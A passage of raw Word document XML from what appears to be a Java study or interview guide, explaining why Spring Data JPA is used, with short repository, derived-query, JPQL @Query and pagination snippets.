          <v:rect id="_x0000_i2130" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C3F8D7" w14:textId="1557D959" w:rsidR="00F618CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F618CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="451" w:name="_Toc196307931"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Why do we use Spring data JPA?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="451"/>
    </w:p>
    <w:p w14:paraId="237524FD" w14:textId="03F61B10" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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We use </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Data JPA</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because it significantly simplifies database interaction in Java applications, especially when working with </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPA (Java Persistence API)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for ORM (Object-Relational Mapping). It reduces boilerplate code, enhances productivity, and integrates seamlessly with the Spring ecosystem. Here are the key reasons for using Spring Data JPA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6018BC53" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. Simplifies Data Access Layer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFDA1C2" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1928"/>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Spring Data JPA abstracts away much of the complexity involved in data access, especially for CRUD operations. You don’t need to write boilerplate code for simple operations like save(), delete(), findAll(), or findById(). These methods are automatically provided through Spring Data JPA repositories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30334EA4" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2. Repository Pattern Implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5CC823" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1929"/>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Spring Data JPA introduces the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Repository pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, where interfaces like JpaRepository, CrudRepository, or PagingAndSortingRepository can be extended to easily interact with the database without writing explicit queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7176C965" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1929"/>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These repositories handle most of the CRUD operations automatically, making it easier to manage entities and database interactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751909FF" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3. Automatic Query Generation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA16176" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1930"/>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lastRenderedPageBreak/>
        <w:t xml:space="preserve">One of the main benefits of Spring Data JPA is </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatic query generation</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> based on method names. For example, a method like findByName() will automatically generate the correct query to search for records with the given name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3624E660" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1930"/>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This reduces the need for writing boilerplate queries manually, saving development time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A6CA0A" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6F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public interface EmployeeRepository extends JpaRepository&lt;Employee, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A1C151" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6F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List&lt;Employee&gt; findByName(String name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D82188B" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F45759" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4. Custom Queries with JPQL or Native SQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C7DCC8" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1931"/>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Spring Data JPA allows you to define custom queries using </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPQL (Java Persistence Query Language)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>native SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. You can write more complex queries when needed, while still benefiting from the abstraction provided by Spring Data JPA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686DAA6A" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1931"/>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You can use the @Query annotation to define custom queries and avoid writing boilerplate code for frequently used queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522F8278" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6F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Query("SELECT e FROM Employee e WHERE e.name = :name")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AD06E5" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6F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List&lt;Employee&gt; findEmployeesByName(@Param("name") String name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEE35BE" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5. Integration with Spring Ecosystem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1090767E" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1932"/>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Since Spring Data JPA is part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, it integrates seamlessly with other Spring components, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Boot</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Transaction Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This provides a unified approach to managing entities, transactions, and other aspects of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111E89A8" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>6. Pagination and Sorting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B93A941" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1933"/>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Spring Data JPA provides easy support for </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pagination</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sorting</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This is particularly useful when dealing with large datasets where you need to display a subset of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD0F76F" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1933"/>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You can pass Pageable and Sort objects to repository methods to implement pagination and sorting with minimal code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB1287A" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6F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public Page&lt;Employee&gt; findByName(String name, Pageable pageable);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206AB148" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>7. Avoids Boilerplate Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381FCC48" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1934"/>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Spring Data JPA reduces the amount of code you need to write for database operations. You no longer need to manually handle entity management, queries, or transactions in most cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36ECB7AE" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1934"/>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It manages things like session handling, transaction management, and exception handling for you.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324F59AA" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>8. Entity Management and Lazy Loading:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292FA53A" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1935"/>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Spring Data JPA works with </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPA providers</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to manage entities and their relationships. It handles complex relationships such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one-to-many</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>many-to-one</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>many-to-many</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> automatically, including managing lazy and eager loading of relationships.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E26D13" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
